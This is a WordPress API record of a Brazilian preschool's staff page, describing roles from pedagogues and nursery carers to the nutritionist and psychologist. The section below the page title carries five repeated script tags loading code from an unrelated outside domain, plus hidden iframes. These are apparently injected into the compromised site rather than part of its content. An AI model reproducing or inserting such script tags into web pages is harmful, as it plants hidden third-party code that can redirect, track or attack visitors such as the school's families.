{"id":3685,"date":"2023-09-12T12:01:30","date_gmt":"2023-09-12T10:01:30","guid":{"rendered":"https:\/\/wordpress.vecurosoft.com\/kiddino\/?page_id=3685"},"modified":"2025-04-28T17:17:21","modified_gmt":"2025-04-28T20:17:21","slug":"our-teachers","status":"publish","type":"page","link":"https:\/\/colegiounicocampinas.com.br\/?page_id=3685","title":{"rendered":"Nossa Equipe"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"3685\" class=\"elementor elementor-3685\" data-elementor-settings=\"{&quot;ha_cmc_init_switcher&quot;:&quot;no&quot;}\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-622adf4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"622adf4\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-32a8345\" data-id=\"32a8345\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b5c803f elementor-widget elementor-widget-kiddinosectiontitle\" data-id=\"b5c803f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinosectiontitle.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!-- Section Title --><div class=\"title-area\" ><h2 class=\"sec-title title-selector\">Nossa Equipe<\/h2><\/div><!-- End Section Title -->\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f23fba2 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"f23fba2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"title-divider2\">\u00a0<\/div><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-22d2cd9 e-grid e-con-boxed e-con e-parent\" data-id=\"22d2cd9\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-6add4a9 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"6add4a9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-6add4a9\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/professora.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">Pedagogas<\/h2><h3 class=\"eael-team-member-position\">Especialistas em Educa\u00e7\u00e3o<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">As Pedagogas s\u00e3o especialistas em promover o desenvolvimento integral das crian\u00e7as, abrangendo aspectos f\u00edsico, emocional, social e intelectual. Elas planejam e executam atividades l\u00fadicas e pedag\u00f3gicas, como jogos, brincadeiras, m\u00fasicas e atividades interativas, para estimular o aprendizado e o desenvolvimento das crian\u00e7as. Tamb\u00e9m acompanham o progresso individual de cada crian\u00e7a, identificando suas habilidades e necessidades. Al\u00e9m disso, criam um ambiente de respeito e inclus\u00e3o, promovendo a intera\u00e7\u00e3o entre as crian\u00e7as e o desenvolvimento de habilidades sociais.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ca3fc80 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"ca3fc80\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-ca3fc80\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/bercarista.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">Ber\u00e7aristas<\/h2><h3 class=\"eael-team-member-position\">Especialistas em beb\u00eas<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">Ber\u00e7aristas s\u00e3o especialistas em cuidar e estimular beb\u00eas e crian\u00e7as pequenas em idade de ber\u00e7\u00e1rio. Suas fun\u00e7\u00f5es incluem alimenta\u00e7\u00e3o, higiene, troca de fraldas, supervis\u00e3o do sono, e a cria\u00e7\u00e3o de um ambiente seguro e afetivo para o desenvolvimento das crian\u00e7as.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c19bbfd eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"c19bbfd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-c19bbfd\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/auxiliar.jpg\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">Auxiliares<\/h2><h3 class=\"eael-team-member-position\">Especialistas em assist\u00eancia \u00e0 crian\u00e7a<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">As Auxiliares s\u00e3o especialistas em auxiliar as Pedagogas no cuidado e educa\u00e7\u00e3o das crian\u00e7as, oferecendo apoio em atividades do dia a dia, como alimenta\u00e7\u00e3o, higiene e recrea\u00e7\u00e3o. Tamb\u00e9m contribuem para criar um ambiente seguro, acolhedor e estimulante para as crian\u00e7as, promovendo atividades l\u00fadicas e educativas.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-31ac1d1 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"31ac1d1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-31ac1d1\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/cozinha.jpg\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">COZINHEIRA<\/h2><h3 class=\"eael-team-member-position\">especialista em refei\u00e7\u00f5es<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">A cozinheira \u00e9 especialista em preparar e servir refei\u00e7\u00f5es para as crian\u00e7as, seguindo um card\u00e1pio pr\u00e9-estabelecido pela Nutricionista. Al\u00e9m disso, ela \u00e9 respons\u00e1vel por manter a cozinha limpa e organizada, garantir o frescor, a higiene dos alimentos e utens\u00edlios, e auxiliar na gest\u00e3o dos estoques. Ela possui um \"toque m\u00e1gico\" que faz com que as crian\u00e7as comam alimentos que n\u00e3o costumam comer fora da escola e todos os pais sonham em conhecer o seu segredo.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3e49d47 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"3e49d47\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-3e49d47\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/nutricionista.jpg\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">NUTRICIONISTA<\/h2><h3 class=\"eael-team-member-position\">especialista em nutri\u00e7\u00e3o<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">A nutricionista \u00e9 especialista na promo\u00e7\u00e3o da sa\u00fade e no desenvolvimento de h\u00e1bitos alimentares saud\u00e1veis nas crian\u00e7as. Ele elabora e acompanha o card\u00e1pio, garante a qualidade e seguran\u00e7a dos alimentos, orienta a cozinheira, pais e professores sobre alimenta\u00e7\u00e3o e nutri\u00e7\u00e3o, e participa de atividades de educa\u00e7\u00e3o nutricional, como a hortinha e as oficinas culin\u00e1rias.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-dac0d6f eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"dac0d6f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-dac0d6f\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/english-teacher-NEW.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">Professora de Ingl\u00eas<\/h2><h3 class=\"eael-team-member-position\">Especialista no Ensino do Idioma<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">Especialista em desenvolver a flu\u00eancia no segundo idioma de maneira similar a l\u00edngua materna, de forma org\u00e2nica, sem press\u00f5es, de maneira envolvente e com atividades l\u00fadicas.  Busca despertar, inspirar e desenvolver nas crian\u00e7as, sua vontade natural em aprender, oferecendo um espa\u00e7o m\u00e1gico onde possam se aventurar no mundo bil\u00edngue com muita divers\u00e3o e aprendizado.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-81892be eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"81892be\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-81892be\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte.jpg\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">PROFESSORA DE ARTE<\/h2><h3 class=\"eael-team-member-position\">Especialista no ensino da Arte<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">Especialista em ensinar e promover a compreens\u00e3o e a aprecia\u00e7\u00e3o da arte, tanto em termos de t\u00e9cnicas art\u00edsticas quanto de hist\u00f3ria e cultura. Elas s\u00e3o respons\u00e1veis por planejar e ministrar aulas que estimulem a criatividade e a express\u00e3o das crian\u00e7as, utilizando diversas formas de arte como pintura, escultura, m\u00fasica, teatro e dan\u00e7a. Al\u00e9m disso, a professora de arte busca cultivar a sensibilidade est\u00e9tica e a autoexpress\u00e3o dos estudantes, incentivando-os a explorar e desenvolver sua capacidade de criar e interpretar obras de arte. \n<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-85b91ed eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"85b91ed\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-85b91ed\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/educador-fisico.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">Educadora F\u00edsica<\/h2><h3 class=\"eael-team-member-position\">Especialista em educa\u00e7\u00e3o f\u00edsica, Psicomotricidade e Autismo. <\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">Especialista em promover o desenvolvimento global da crian\u00e7a, considerando tanto o aspecto f\u00edsico quanto o emocional, social e cognitivo. Busca integrar a mente e o corpo, ajudando a crian\u00e7a a perceber e a compreender seu corpo no espa\u00e7o, melhorar a coordena\u00e7\u00e3o motora, a percep\u00e7\u00e3o e o equil\u00edbrio, al\u00e9m de estimular o desenvolvimento da linguagem, da socializa\u00e7\u00e3o e da autonomia. As aulas tamb\u00e9m incluem viv\u00eancias de brincadeiras, jogos, e atividades, nas quais as crian\u00e7as possam expressar suas emo\u00e7\u00f5es, trabalhar as rela\u00e7\u00f5es de respeito, afetividade e cuidado  com o pr\u00f3ximo.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-398bd70 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"398bd70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-398bd70\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/fono2.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">FONOAUDI\u00d3LOGA<\/h2><h3 class=\"eael-team-member-position\">ESpecialista em linguagem<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">A fonoaudi\u00f3loga \u00e9 especialista em trabalhar para otimizar o desenvolvimento da audi\u00e7\u00e3o, linguagem, fala, voz e fun\u00e7\u00f5es orofaciais das crian\u00e7as, promovendo o sucesso na aprendizagem e desenvolvimento escolar. Isso inclui atividades como avalia\u00e7\u00e3o, preven\u00e7\u00e3o e tratamento de dist\u00farbios de fala, linguagem e audi\u00e7\u00e3o, al\u00e9m de orienta\u00e7\u00f5es e parcerias com as pedagogas e pais para um desenvolvimento escolar mais completo.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fd74cb6 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"fd74cb6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-fd74cb6\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/psicopedagogo.jpg\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">PSICOPEDAGOGA<\/h2><h3 class=\"eael-team-member-position\">especialista em crian\u00e7a<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">A psicopedagoga \u00e9 especialista no acompanhamento do desenvolvimento da crian\u00e7a, auxiliando na identifica\u00e7\u00e3o e resolu\u00e7\u00e3o de dificuldades de aprendizagem, al\u00e9m de promover um ambiente escolar mais positivo e inclusivo. Ela trabalha com a avalia\u00e7\u00e3o psicopedag\u00f3gica, interven\u00e7\u00f5es individuais ou em grupo, orienta\u00e7\u00e3o aos pais e professores, e preven\u00e7\u00e3o de problemas de aprendizagem.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-0b1fdb9 eael-team-align-eael-team-align-default elementor-widget elementor-widget-eael-team-member\" data-id=\"0b1fdb9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-team-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\n\t<div id=\"eael-team-member-0b1fdb9\" class=\"eael-team-item eael-team-members-simple \">\n\t\t<div class=\"eael-team-item-inner\">\n\t\t\t<div class=\"eael-team-image\">\n\t\t\t\t<figure>\n\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/psicologo.png\" alt=\"\">\n\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div>\n\n\t\t\t<div class=\"eael-team-content\">\n\t\t\t\t<h2 class=\"eael-team-member-name\">PSIC\u00d3LOGA<\/h2><h3 class=\"eael-team-member-position\">especialista em bem estar emocional<\/h3>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<p class=\"eael-team-text\">A psic\u00f3loga \u00e9 especialista em promover o desenvolvimento integral das crian\u00e7as, professores e da comunidade escolar, facilitando o processo de aprendizagem e o bem-estar emocional. Essa atua\u00e7\u00e3o se manifesta atrav\u00e9s de diferentes atividades, como orienta\u00e7\u00e3o individualizada, suporte emocional, avalia\u00e7\u00e3o psicol\u00f3gica, preven\u00e7\u00e3o de problemas e interven\u00e7\u00e3o em situa\u00e7\u00f5es de risco.<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Nossa Equipe \u00a0 Pedagogas Especialistas em Educa\u00e7\u00e3o As Pedagogas s\u00e3o especialistas em promover o desenvolvimento integral das crian\u00e7as, abrangendo aspectos f\u00edsico, emocional, social e intelectual. Elas planejam e executam atividades l\u00fadicas e pedag\u00f3gicas, como jogos, brincadeiras, m\u00fasicas e atividades interativas, para estimular o aprendizado e o desenvolvimento das crian\u00e7as. Tamb\u00e9m acompanham o progresso individual de&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"class_list":["post-3685","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/3685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3685"}],"version-history":[{"count":8,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/3685\/revisions"}],"predecessor-version":[{"id":5867,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/3685\/revisions\/5867"}],"wp:attachment":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}